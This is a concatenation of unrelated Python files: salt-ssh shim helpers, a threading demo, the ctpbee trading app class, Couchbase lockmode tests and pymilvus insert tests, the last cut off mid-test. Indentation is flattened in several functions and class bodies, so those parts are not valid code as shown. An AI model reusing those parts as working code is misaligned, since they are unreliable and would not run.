            stdout, stderr, retcode = self.shim_cmd(cmd_str)
            if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
                # If RSTR is not seen in both stdout and stderr then there
                # was a thin deployment problem.
                return (
                    "ERROR: Failure deploying ext_mods: {}".format(stdout),
                    stderr,
                    retcode,
                )
            while re.search(RSTR_RE, stdout):
                stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
            while re.search(RSTR_RE, stderr):
                stderr = re.split(RSTR_RE, stderr, 1)[1].strip()

    return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
    """
    Map raw shim output to a human-readable error description.

    Returns None when the shim ran without errors (or was never
    reached), otherwise a short message that cmd_block() uses to decide
    how to recover (redeploy thin, install Python on Windows, or abort).
    """
    stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
    stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
    if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
        # RSTR was found in stdout which means that the shim
        # functioned without *errors* . . . but there may be shim
        # commands, unless the only thing we found is RSTR
        return None

    if re.search(RSTR_RE, stderr):
        # Undefined state
        return "Undefined SHIM state"

    if stderr.startswith("Permission denied"):
        # SHIM was not even reached
        return None

    perm_error_fmt = (
        "Permissions problem, target user may need to be root or use sudo:\n {0}"
    )

    # Each entry: (retcodes that match, regex to search stderr for,
    # message to return)
    errors = [
        (
            (),
            "sudo: no tty present and no askpass program specified",
            "sudo expected a password, NOPASSWD required",
        ),
        (
            (salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
            "Python interpreter is too old",
            "Python version error. Recommendation(s) follow:\n"
            "- Install Python 3 on the target machine(s)\n"
            "- You can use ssh_pre_flight or raw shell (-r) to install Python 3",
        ),
        (
            (salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
            "checksum mismatched",
            "The salt thin transfer was corrupted",
        ),
        (
            (salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
            "scp not found",
            "No scp binary. openssh-clients package required",
        ),
        (
            (salt.defaults.exitcodes.EX_CANTCREAT,),
            "salt path .* exists but is not a directory",
            "A necessary path for salt thin unexpectedly exists:\n " + stderr,
        ),
        (
            (),
            "sudo: sorry, you must have a tty to run sudo",
            "sudo is configured with requiretty",
        ),
        ((), "Failed to open log file", perm_error_fmt.format(stderr)),
        ((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
        (
            (),
            "Failed to create directory path.*/salt",
            perm_error_fmt.format(stderr),
        ),
        (
            (salt.defaults.exitcodes.EX_SOFTWARE,),
            "exists but is not",
            "An internal error occurred with the shim, please investigate:\n "
            + stderr,
        ),
        (
            (),
            "The system cannot find the path specified",
            "Python environment not found on Windows system",
        ),
        (
            (),
            "is not recognized",
            "Python environment not found on Windows system",
        ),
    ]

    for error in errors:
        if retcode in error[0] or re.search(error[1], stderr):
            return error[2]
    return None
def check_refresh(self, data, ret):
    """
    Stub out check_refresh; the ssh client has no module refresh cycle.
    """
    return None
def module_refresh(self):
    """
    Module refresh is not needed over ssh; stub it out.
    """
    return None
def lowstate_file_refs(chunks):
    """
    Create a dict mapping saltenv -> lists of salt:// file references
    found in the given lowstate chunks.
    """
    refs = {}
    for chunk in chunks:
        saltenv = "base"
        chunk_refs = []
        for key in chunk:
            if key in ("__env__", "saltenv"):
                saltenv = chunk[key]
            elif key.startswith("__"):
                continue
            else:
                chunk_refs.extend(salt_refs(chunk[key]))
        if chunk_refs:
            refs.setdefault(saltenv, []).append(chunk_refs)
    return refs
def salt_refs(data):
    """
    Pull salt:// file references out of a state value.

    A matching string yields a one-element list; a list yields every
    matching string element; anything else yields an empty list.
    """
    proto = "salt://"
    if isinstance(data, str):
        return [data] if data.startswith(proto) else []
    if isinstance(data, list):
        return [
            item
            for item in data
            if isinstance(item, str) and item.startswith(proto)
        ]
    return []
def mod_data(fsclient):
    """
    Generate the module arguments for the shim data

    Collects custom modules (files under ``_modules``, ``_states``, ...)
    from every fileserver environment, hashes them into a version string
    and packs them into a cached ``ext_mods.<ver>.tgz`` tarball.

    Returns ``{"version": ver, "file": tarball_path}`` or ``{}`` when no
    custom modules exist.
    """
    # TODO, change out for a fileserver backend
    sync_refs = [
        "modules",
        "states",
        "grains",
        "renderers",
        "returners",
    ]
    ret = {}
    envs = fsclient.envs()
    ver_base = ""
    for env in envs:
        files = fsclient.file_list(env)
        for ref in sync_refs:
            mods_data = {}
            pref = "_{}".format(ref)
            for fn_ in sorted(files):
                if fn_.startswith(pref):
                    if fn_.endswith((".py", ".so", ".pyx")):
                        full = salt.utils.url.create(fn_)
                        mod_path = fsclient.cache_file(full, env)
                        if not os.path.isfile(mod_path):
                            continue
                        mods_data[os.path.basename(fn_)] = mod_path
                        # Fold every module's hash into the version base
                        chunk = salt.utils.hashutils.get_hash(mod_path)
                        ver_base += chunk
            if mods_data:
                if ref in ret:
                    ret[ref].update(mods_data)
                else:
                    ret[ref] = mods_data
    if not ret:
        return {}
    ver_base = salt.utils.stringutils.to_bytes(ver_base)
    ver = hashlib.sha1(ver_base).hexdigest()
    ext_tar_path = os.path.join(
        fsclient.opts["cachedir"], "ext_mods.{}.tgz".format(ver)
    )
    mods = {"version": ver, "file": ext_tar_path}
    if os.path.isfile(ext_tar_path):
        # Tarball for this exact module set already cached
        return mods
    # Use a context manager so the tarball handle is closed even if
    # writing a member raises (the original leaked the handle on error)
    with tarfile.open(ext_tar_path, "w:gz") as tfp:
        verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
        with salt.utils.files.fopen(verfile, "w+") as fp_:
            fp_.write(ver)
        tfp.add(verfile, "ext_version")
        for ref in ret:
            for fn_ in ret[ref]:
                tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
    return mods
def ssh_version():
    """
    Returns the version of the installed ssh command as a tuple of ints.

    Parses "OpenSSH_X.Yp1, ..." from ``ssh -V`` (printed on stderr).
    Parsing stops at the first component that is not a plain integer,
    so "OpenSSH_8.2p1" yields ``(8,)`` and an unparseable banner
    yields ``(2, 0)``.
    """
    # This function needs more granular checks and to be validated against
    # older versions of ssh
    ret = subprocess.Popen(
        ["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
    ).communicate()
    try:
        version_parts = ret[1].split(b",")[0].split(b"_")[1]
        parts = []
        # BUG FIX: iterating a bytes object in Python 3 yields ints, so
        # the original ``for part in version_parts`` never hit ValueError
        # and returned ASCII byte values instead of version numbers.
        # Split on b"." to get the actual numeric components.
        for part in version_parts.split(b"."):
            try:
                parts.append(int(part))
            except ValueError:
                return tuple(parts)
        return tuple(parts)
    except IndexError:
        return (2, 0)
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{}={}".format(key, arg[key]))
else:
converted.append(arg)
return converted
|
threadSimple.py | #!/usr/bin/python
# Simple threading program
import time
import threading
def printChars():
    """Print the integers 0 through 9, one per line."""
    # print() with a single argument is valid on both Python 2 and 3;
    # the original Python-2-only ``print x`` statement is a syntax
    # error on Python 3.
    for x in range(0, 10):
        print(x)
def printLines():
    """Print a greeting ten times, pausing one second between lines."""
    # print() with a single argument is valid on both Python 2 and 3;
    # the original ``print "..."`` statement is Python-2-only.
    for _ in range(0, 10):
        print("Hello Thread!")
        time.sleep(1)
# Launch both workers so they run concurrently; the interpreter will
# wait for these non-daemon threads before exiting.
t1 = threading.Thread(target=printChars)
t2 = threading.Thread(target=printLines)
for worker in (t1, t2):
    worker.start()
|
app.py | # coding:utf-8
import os
import sys
from datetime import datetime
from inspect import ismethod
from threading import Thread
from time import sleep
from typing import Text
from werkzeug.datastructures import ImmutableDict
from ctpbee import __version__
from ctpbee.looper.data import VessData
from ctpbee.looper.report import render_result
from ctpbee.util import RiskLevel
from ctpbee.center import Center
from ctpbee.config import Config
from ctpbee.constant import Exchange
from ctpbee.context import _app_context_ctx
from ctpbee.constant import Event, EVENT_TIMER
from ctpbee.exceptions import ConfigError
from ctpbee.helpers import end_thread
from ctpbee.helpers import find_package, refresh_query, graphic_pattern
from ctpbee.interface import Interface
from ctpbee.level import CtpbeeApi, Action
from ctpbee.log import VLogger
from ctpbee.record import Recorder
from ctpbee.cprint_config import CP
from ctpbee.jsond import dumps
from ctpbee.signals import AppSignal, common_signals
class CtpBee(object):
"""
ctpbee 源于我对于做项目的痛点需求, 旨在开发出一套具有完整api的交易微框架
I hope it will help you !
"""
# Default backtest (looper) configuration parameters
default_params = {
    'cash': 10000.0,
    'check_submit': True,
    'eos_bar': False,
    'filler': None,
    "commision": 0.01,
    'slip_percent': 0.0,
    'slip_fixed': 0.0,
    'slip_open': False,
    'slip_match': True,
    'slip_limit': True,
    'slip_out': False,
    'coc': False,
    'coo': False,
    'int2pnl': True,
    'short_cash': True,
    'fund_start_val': 100.0,
    'fund_mode': False
}
default_config = ImmutableDict(
    dict(LOG_OUTPUT=True,  # whether to enable log output
         TD_FUNC=False,  # whether to enable the trading (TD) API
         INTERFACE="ctp",  # interface name; defaults to domestic futures CTP
         MD_FUNC=True,  # whether to enable the market-data (MD) API
         XMIN=[],  # k-line periods to generate (any period up to one hour)
         ALL_SUBSCRIBE=False,
         SHARE_MD=False,  # whether to share market data across accounts ---> pending
         SLIPPAGE_COVER=0,  # slippage when closing long positions
         SLIPPAGE_SELL=0,  # slippage when closing short positions
         SLIPPAGE_SHORT=0,  # slippage when selling short
         SLIPPAGE_BUY=0,  # slippage when buying long
         LOOPER_PARAMS=default_params,  # parameters required for backtesting
         SHARED_FUNC=False,  # intraday chart data --> pending optimization
         REFRESH_INTERVAL=1.5,  # refresh interval (seconds); only effective when CtpBee(refresh=True)
         INSTRUMENT_INDEPEND=False,  # whether each strategy gets independent market data
         CLOSE_PATTERN="today",  # for exchanges supporting close-today: prefer "today" or "yesterday" (other values: unspecified in original)
         TODAY_EXCHANGE=[Exchange.SHFE.value, Exchange.INE.value],  # exchanges needing close-today support
         AFTER_TIMEOUT=3,  # timeout (seconds) for the `after` thread
         TIMER_INTERVAL=1,
         PATTERN="real"
         ))
config_class = Config
import_name = None
# Trade API and market-data API handles
market = None
trader = None
tools = {}
def __init__(self,
             name: Text,
             import_name,
             action_class: Action or None = None,
             engine_method: str = "thread",
             logger_class=None, logger_config=None,
             refresh: bool = False,
             risk: RiskLevel = None,
             instance_path=None):
    """
    name: name of this running core instance
    import_name: name of the importing package; just pass __name__
    action_class: executor > defaults to the built-in Action, or pass a user subclass
    engine_method: underlying engine used by the Actor model
    logger_class: logger class; may be user defined
    logger_config: configuration passed to a custom logger class
    refresh: whether to actively refresh positions
    risk: risk-management class; subclass RiskLevel to customize
    instance_path: absolute path for instance data; auto-derived when None

    NOTE(review): the original docstring also described a ``sim``
    (simulation) parameter that does not exist in the signature.
    """
    self.start_datetime = datetime.now()
    self.basic_info = None
    self._extensions = {}
    self.name = name if name else 'ctpbee'
    self.import_name = import_name
    self.engine_method = engine_method
    self.refresh = refresh
    self.active = False
    # 是否加载以使用默认的logger类/ choose if use the default logging class
    if logger_class is None:
        self.logger = VLogger(CP, app_name=self.name)
        self.logger.set_default(name=self.logger.app_name, owner=self.name)
    else:
        if logger_config:
            self.logger = logger_class(logger_config, app_name=self.name)
        else:
            self.logger = logger_class(CP, app_name=self.name)
        self.logger.set_default(name=self.logger.app_name, owner='App')
    self.app_signal = AppSignal(self.name)
    # Only the thread-based engine is currently implemented
    if engine_method == "thread":
        self.recorder = Recorder(self)
    else:
        raise TypeError("引擎参数错误,只支持 thread 和 async,请检查代码")
    """
    If no risk is specified by default, set the risk_decorator to None
    如果默认不指定action参数, 那么使用设置风控装饰器为空
    """
    if risk is None:
        self.risk_decorator = None
    else:
        self.risk_decorator = risk
    """
    If no action is specified by default, use the default Action class
    如果默认不指定action参数, 那么使用默认的Action类
    """
    if action_class is None:
        self.action: Action = Action(self)
    else:
        self.action: Action = action_class(self)
    """
    根据action里面的函数更新到CtpBee上面来
    bind the function of action to CtpBee
    """
    """
    If engine_method is specified by default, use the default EventEngine and Recorder or use the engine
    and recorder basis on your choice
    如果不指定engine_method参数,那么使用默认的事件引擎 或者根据你的参数使用不同的引擎和记录器
    """
    if instance_path is None:
        instance_path = self.auto_find_instance_path()
    elif not os.path.isabs(instance_path):
        raise ValueError(
            'If an instance path is provided it must be absolute.'
            ' A relative path was given instead.'
        )
    self.instance_path = instance_path
    self.config = self.make_config()
    self.init_finished = False
    self.qifi = None
    # default monitor and flag
    self.p = None
    self.p_flag = True

    self.r = None
    self.r_flag = True

    self.center: Center = Center(self)
    """ update """
    if self.risk_decorator is not None:
        self.risk_decorator.update_app(self)
    # Re-bind every public Action method directly onto the app instance
    # so e.g. app.buy(...) dispatches to action.buy(...)
    for x in dir(self.action):
        func = getattr(self.action, x)
        if x.startswith("__"):
            continue
        if ismethod(func):
            setattr(self, func.__name__, func)
    _app_context_ctx.push(self.name, self)
    self.data = []
def add_data(self, *data):
"""
载入历史回测数据
"""
if self.config.get("PATTERN") == "looper":
self.data = data
else:
raise TypeError("此API仅仅接受回测模式, 请通过配置文件 PATTERN 修改运行模式")
def update_action_class(self, action_class):
if isinstance(action_class, Action):
raise TypeError(f"更新action_class出现错误, 你传入的action_class类型为{type(action_class)}")
self.action = action_class(self)
def update_risk_gateway(self, gateway_class):
self.risk_decorator = gateway_class
self.risk_decorator.update_app(self)
def make_config(self):
""" 生成class类"""
defaults = dict(self.default_config)
return self.config_class(self.instance_path, defaults)
def auto_find_instance_path(self):
prefix, package_path = find_package(self.import_name)
if prefix is None:
return os.path.join(package_path)
return os.path.join(prefix, 'var', self.name + '-instance')
    @property
    def td_login_status(self):
        """Trading login status; every trading API must expose ``td_status``."""
        return self.trader.td_status
    @property
    def md_login_status(self):
        """Market-data login status; every market API must expose ``md_status``."""
        return self.market.md_status
    def _running(self, logout=True):
        """Load the market-data API and trading API from the current config.

        Either API is optional: it is only created when the corresponding
        MD_FUNC / TD_FUNC flag is set in the config.

        :param logout: whether to print the startup banner.
        :raises ConfigError: when CONNECT_INFO is missing from the config.
        """
        self.active = True
        if "CONNECT_INFO" in self.config.keys():
            info = self.config.get("CONNECT_INFO")
        else:
            raise ConfigError(message="没有相应的登录信息", args=("没有发现登录信息",))
        show_me = graphic_pattern(__version__, self.engine_method)
        if logout:
            print(show_me)
        MdApi, TdApi = Interface.get_interface(self)
        if self.config.get("MD_FUNC"):
            self.market = MdApi(self.app_signal)
            self.market.connect(info)
        if self.config.get("TD_FUNC"):
            self.trader = TdApi(self.app_signal)
            self.trader.connect(info)
        if self.refresh:
            if self.r is not None:
                # A refresh thread already exists (e.g. after reload()): signal it
                # to stop via r_flag, wait one refresh interval for it to drain,
                # then start a fresh daemon thread.
                self.r_flag = False
                sleep(self.config['REFRESH_INTERVAL'] + 1.5)
                self.r = Thread(target=refresh_query, args=(self,), daemon=True)
                self.r.start()
            else:
                self.r = Thread(target=refresh_query, args=(self,), daemon=True)
                self.r.start()
            self.r_flag = True
    def start(self, log_output=True, debug=False):
        """Start the app according to the configured PATTERN.

        :param log_output: whether to print log / banner output.
        :param debug: whether to enable debug mode (not implemented yet).
        :raises ValueError: when PATTERN is neither "real" nor "looper".
        """
        if self.config.get("PATTERN") == "real":
            # Live trading: spawn a timer thread that periodically fires
            # EVENT_TIMER on the shared signal bus, then bring up the APIs.
            def running_timer(common_signal):
                while True:
                    event = Event(type=EVENT_TIMER)
                    common_signal.timer_signal.send(event)
                    sleep(self.config['TIMER_INTERVAL'])
            self.timer = Thread(target=running_timer, args=(common_signals,))
            self.timer.start()
            self.config["LOG_OUTPUT"] = log_output
            self._running(logout=log_output)
        elif self.config.get("PATTERN") == "looper":
            # Backtest: swap in the looper interface and replay data.
            self.config["INTERFACE"] = "looper"
            show_me = graphic_pattern(__version__, self.engine_method)
            if log_output:
                print(show_me)
            Trader, Market = Interface.get_interface(app=self)
            self.trader = Trader(self.app_signal, self)
            self.market = Market(self.app_signal)
            print(">>>> 回测接口载入成功")
            self._start_looper()
        else:
            raise ValueError("错误的参数, 仅仅支持")
def get_result(self, report: bool = False, **kwargs):
"""
计算回测结果,生成回测报告
:param report: bool ,指定是否输出策略报告
:param auto_open: bool, 是否让浏览器自动打开回测报告
:param zh:bpol, 是否输出成中文报告
"""
strategys = list(self._extensions.keys())
end_time = datetime.now()
"""
账户数据
"""
account_data = self.trader.account.get_mapping("balance")
"""
耗费时间
"""
cost_time = f"{str(end_time.hour - self.start_datetime.hour)}" \
f"h {str(end_time.minute - self.start_datetime.minute)}m " \
f"{str(end_time.second - self.start_datetime.second)}s"
"""
每日盈利
"""
net_pnl = self.trader.account.get_mapping("net_pnl")
"""
成交单数据
"""
trade_data = list(map(dumps, self.trader.traded_order_mapping.values()))
position_data = self.trader.position_detail
if report:
path = render_result(self.trader.account.result, trade_data=trade_data, strategy=strategys,
net_pnl=net_pnl,
account_data=account_data, datetimed=end_time, position_data=position_data,
cost_time=cost_time, **kwargs)
print(f"请复制下面的路径到浏览器打开----> \n {path}")
return path
return self.trader.account.result
def add_basic_info(self, info):
""" 添加基础手续费以及size_map等信息 """
if self.config.get("PATTERN") != "looper":
raise TypeError("此API仅在回测模式下进行调用")
self.basic_info = info
    def _start_looper(self):
        """Replay the loaded historical data through the looper trader.

        Iterates the VessData feed until exhaustion, pushing each tick/bar
        into the trader; StopIteration marks a normal end of the backtest.
        """
        d = VessData(*self.data)
        # Forward optional contract metadata (fees, size map) to the account.
        if self.basic_info is not None:
            self.trader.account.basic_info = self.basic_info
        """ trader初始化参数"""
        self.trader.init_params(params=self.config)
        while True:
            try:
                p = next(d)
                self.trader(p)
            except StopIteration:
                self.logger.info("回测结束,正在生成结果")
                break
            except ValueError:
                # NOTE(review): re-raising drops the original traceback context;
                # ``raise ... from e`` would preserve it — confirm before changing.
                raise ValueError("数据存在问题, 请检查")
def remove_extension(self, extension_name: Text) -> None:
"""移除插件"""
if extension_name in self._extensions:
del self._extensions[extension_name]
def add_extension(self, extension: CtpbeeApi):
"""添加插件"""
self._extensions.pop(extension.extension_name, None)
extension.init_app(self)
def suspend_extension(self, extension_name):
extension = self._extensions.get(extension_name, None)
if not extension:
return False
extension.frozen = True
return True
def get_extension(self, extension_name):
if extension_name in self._extensions:
return self._extensions.get(extension_name)
else:
return None
def enable_extension(self, extension_name):
extension = self._extensions.get(extension_name, None)
if not extension:
return False
extension.frozen = False
return True
def del_extension(self, extension_name):
self._extensions.pop(extension_name, None)
    def reload(self):
        """Tear down the market/trader APIs and reconnect them.

        Closes both APIs (when present), waits for their processing queues
        to drain, then calls ``_running`` to rebuild the connections.
        """
        if self.market is not None:
            self.market.close()
        if self.trader is not None:
            self.trader.close()
        # Let the processing queues drain before reconnecting.
        sleep(3)
        self.market, self.trader = None, None
        self._running()
    def release(self):
        """Release the account and shut down safely.

        Closes both APIs and force-terminates the refresh and timer
        threads. AttributeError is swallowed so release() is safe to call
        even when some of these attributes were never created.
        """
        try:
            if self.market is not None:
                self.market.close()
            if self.trader is not None:
                self.trader.close()
            self.market, self.trader = None, None
            if self.r is not None:
                """ 强行终结掉线程 """
                end_thread(self.r)
            if self.timer is not None:
                end_thread(self.timer)
        except AttributeError:
            # Attributes such as ``timer`` may not exist if start() was never
            # called in "real" mode; treat that as already released.
            pass
|
lockmode_t.py | #
# Copyright 2013, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from threading import Thread
import time
from couchbase_v2.exceptions import ObjectThreadException
from couchbase_tests.base import CouchbaseTestCase, CollectionTestCase
from couchbase.options import LockMode
class LockmodeTest(CollectionTestCase):
    """Tests for the connection ``lockmode`` setting (EXC / NONE / WAIT).

    ``_thr_lockop(0)`` acquires the internal lock, ``_thr_lockop(1)``
    releases it; the tests exercise how each lockmode reacts to a held lock.
    """
    def test_lockmode_defaults(self):
        # default is LOCKMODE_EXC
        key = self.gen_key("lockmode_defaults")
        cb = self.make_connection()
        self.assertEqual(cb.lockmode, LockMode.EXC)
        cb._thr_lockop(0)
        cb._thr_lockop(1)
        cb.upsert(key, "value")
        # LockMode.NONE: explicit lock operations are not supported at all.
        cb = self.make_connection(lockmode=LockMode.NONE)
        self.assertEqual(cb.lockmode, LockMode.NONE)
        self.assertRaises(ObjectThreadException,
                          cb._thr_lockop, 1)
        self.assertRaises(ObjectThreadException,
                          cb._thr_lockop, 0)
        cb.upsert(key, "value")
        cb = self.make_connection(lockmode=LockMode.WAIT)
        self.assertEqual(cb.lockmode, LockMode.WAIT)
        cb._thr_lockop(0)
        cb._thr_lockop(1)
        cb.upsert(key, "value")
        # WAIT without unlock_gil degrades to NONE.
        cb = self.make_connection(lockmode=LockMode.WAIT, unlock_gil=False)
        self.assertEqual(cb.lockmode, LockMode.NONE)
        cb.upsert(key, "value")
    def test_lockmode_exc(self):
        key = self.gen_key("lockmode_exc")
        cb = self.make_connection()
        # While the lock is held, any operation on the connection must fail.
        cb._thr_lockop(0)
        self.assertRaises(ObjectThreadException,
                          cb.upsert,
                          key, "bar")
        cb._thr_lockop(1)
        # Ensure the old value is not buffered
        cb.upsert(key, "baz")
        self.assertEqual(cb.get(key).content, "baz")
    def test_lockmode_wait(self):
        key = self.gen_key("lockmode_wait")
        cb = self.make_connection(lockmode=LockMode.WAIT, unlock_gil=True)
        d = {
            'ended' : 0
        }
        def runfunc():
            cb.upsert(key, "value")
            d['ended'] = time.time()
        # Hold the lock, start a worker that must block on upsert, then
        # release and verify the worker only finished after the release.
        cb._thr_lockop(0)
        t = Thread(target=runfunc)
        t.start()
        time.sleep(0.5)
        time_unlocked = time.time()
        cb._thr_lockop(1)
        t.join()
        self.assertTrue(d['ended'] >= time_unlocked)
|
test_insert.py | import copy
import logging
import threading
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import utils as ut
from common.constants import default_entity, default_entities, default_binary_entity, default_binary_entities, \
default_fields
from common.common_type import CaseLabel
# Per-test timeout (seconds) for insert operations.
ADD_TIMEOUT = 60
uid = "test_insert"
# Field names and sizes shared by all tests below, pulled from the utils module.
field_name = ut.default_float_vec_field_name
binary_field_name = ut.default_binary_vec_field_name
default_nb = ut.default_nb
row_count = ut.row_count
default_tag = ut.default_tag
# A minimal top-10 L2 vector query used by the search-after-insert tests.
default_single_query = {
    "bool": {
        "must": [
            {"vector": {field_name: {"topk": 10, "query": ut.gen_vectors(1, ut.default_dim), "metric_type": "L2",
                                     "params": {"nprobe": 10}}}}
        ]
    }
}
class TestInsertBase:
    """
    ******************************************************************
    The following cases are used to test `insert` function
    ******************************************************************
    """
    @pytest.fixture(
        scope="function",
        params=ut.gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        # if str(connect._cmd("mode")) == "CPU":
        # Skip index types that a CPU-only deployment cannot build.
        if request.param["index_type"] in ut.index_cpu_not_support():
            pytest.skip("CPU not support index_type: ivf_sq8h")
        logging.getLogger().info(request.param)
        return request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_single_filter_fields()
    )
    def get_filter_field(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_single_vector_fields()
    )
    def get_vector_field(self, request):
        yield request.param
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_empty_entity(self, connect, collection):
        """
        target: test insert with empty entity list
        method: set empty entity list as insert method params
        expected: raises a ParamError exception
        """
        entities = []
        with pytest.raises(ParamError) as e:
            connect.insert(collection, entities)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_None(self, connect, collection):
        """
        target: test insert with None
        method: set None as insert method params
        expected: raises a ParamError
        """
        entity = None
        with pytest.raises(Exception) as e:
            connect.insert(collection, entity)
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_collection_not_existed(self, connect):
        """
        target: test insert, with collection not existed
        method: insert entity into a random named collection
        expected: raise a BaseException
        """
        collection_name = ut.gen_unique_str(uid)
        with pytest.raises(BaseException) as e:
            connect.insert(collection_name, default_entities)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_without_connect(self, dis_connect, collection):
        """
        target: test insert entities without connection
        method: create collection and insert entities in it, check if inserted successfully
        expected: raise exception
        """
        with pytest.raises(Exception) as e:
            dis_connect.insert(collection, default_entities)
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_drop_collection(self, connect, collection):
        """
        target: test delete collection after insert entities
        method: insert entities and drop collection
        expected: has_collection false
        """
        result = connect.insert(collection, default_entity)
        assert len(result.primary_keys) == 1
        connect.drop_collection(collection)
        assert connect.has_collection(collection) == False
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_flush_drop_collection(self, connect, collection):
        """
        target: test drop collection after insert entities for a while
        method: insert entities, sleep, and delete collection
        expected: has_collection false
        """
        result = connect.insert(collection, default_entity)
        assert len(result.primary_keys) == 1
        connect.flush([collection])
        connect.drop_collection(collection)
        assert connect.has_collection(collection) == False
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_create_index(self, connect, collection, get_simple_index):
        """
        target: test build index insert after entities
        method: insert entities and build index
        expected: no error raised
        """
        result = connect.insert(collection, default_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([collection])
        connect.create_index(collection, field_name, get_simple_index)
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_after_create_index(self, connect, collection, get_simple_index):
        """
        target: test build index insert after vector
        method: insert entities and build index
        expected: no error raised
        """
        connect.create_index(collection, field_name, get_simple_index)
        result = connect.insert(collection, default_entities)
        assert len(result.primary_keys) == default_nb
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_search(self, connect, collection):
        """
        target: test search entity after insert entity after a while
        method: insert entity, sleep, and search collection
        expected: no error raised
        """
        result = connect.insert(collection, default_entities)
        connect.flush([collection])
        connect.load_collection(collection)
        res = connect.search(collection, default_single_query)
        assert len(res[0]) == ut.default_top_k
    # Disabled (leading underscore): relies on segment_row_limit behaviour.
    @pytest.mark.tags(CaseLabel.L2)
    def _test_insert_segment_row_count(self, connect, collection):
        nb = ut.default_segment_row_limit + 1
        result = connect.insert(collection, ut.gen_entities(nb))
        connect.flush([collection])
        assert len(result.primary_keys) == nb
        stats = connect.get_collection_stats(collection)
        assert len(stats['partitions'][0]['segments']) == 2
        for segment in stats['partitions'][0]['segments']:
            assert segment['row_count'] in [ut.default_segment_row_limit, 1]
    @pytest.fixture(
        scope="function",
        params=[
            1,
            2000
        ],
    )
    def insert_count(self, request):
        yield request.param
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_ids(self, connect, id_collection, insert_count):
        """
        target: test insert entities in collection, use customize ids
        method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
        expected: the length of ids and the collection row count
        """
        nb = insert_count
        ids = [i for i in range(nb)]
        entities = ut.gen_entities(nb)
        entities[0]["values"] = ids
        result = connect.insert(id_collection, entities)
        connect.flush([id_collection])
        assert len(result.primary_keys) == nb
        assert result.primary_keys == ids
        stats = connect.get_collection_stats(id_collection)
        assert stats[row_count] == nb
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_the_same_ids(self, connect, id_collection, insert_count):
        """
        target: test insert vectors in collection, use customize the same ids
        method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
        expected: the length of ids and the collection row count
        """
        nb = insert_count
        ids = [1 for i in range(nb)]
        entities = ut.gen_entities(nb)
        entities[0]["values"] = ids
        result = connect.insert(id_collection, entities)
        connect.flush([id_collection])
        assert len(result.primary_keys) == nb
        assert result.primary_keys == ids
        stats = connect.get_collection_stats(id_collection)
        assert stats[row_count] == nb
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
        """
        target: test create normal collection with different fields, insert entities into id with ids
        method: create collection with diff fields: metric/field_type/..., insert, and count
        expected: row count correct
        """
        nb = 5
        filter_field = get_filter_field
        vector_field = get_vector_field
        collection_name = ut.gen_unique_str("test_collection")
        fields = {
            "fields": [ut.gen_primary_field(), filter_field, vector_field],
            "auto_id": False
        }
        connect.create_collection(collection_name, fields)
        ids = [i for i in range(nb)]
        entities = ut.gen_entities_by_fields(fields["fields"], nb, ut.default_dim, ids)
        logging.getLogger().info(entities)
        result = connect.insert(collection_name, entities)
        assert result.primary_keys == ids
        connect.flush([collection_name])
        stats = connect.get_collection_stats(collection_name)
        assert stats[row_count] == nb
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_ids_not_match(self, connect, id_collection, insert_count):
        """
        target: test insert entities in collection without ids
        method: create id_collection and insert entities without
        expected: exception raised
        """
